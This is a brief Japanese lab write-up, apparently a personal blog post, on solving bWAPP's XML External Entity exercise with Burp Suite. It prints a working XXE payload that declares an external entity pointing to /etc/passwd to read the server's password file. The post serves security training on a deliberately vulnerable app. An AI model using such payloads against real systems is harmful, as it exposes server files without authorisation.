Hello there, ('ω')ノ

 

久しぶりにbWAPPを。

A7 ⇨ XML External Entity Attacks (XXE)を選択して。

Any bugs?ボタンを。

 

 

Burp Suiteでインターセプトして。

リクエスト内容を確認して。

 

 

下記の内容に追加・変更してSendすると。

passwdファイルを表示できて。

 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE header [<!ENTITY xxe SYSTEM "///etc/passwd"> ]>
<reset><login>&xxe;</login><secret>Any bugs?</secret></reset>

 

 

Best regards, (^^ゞ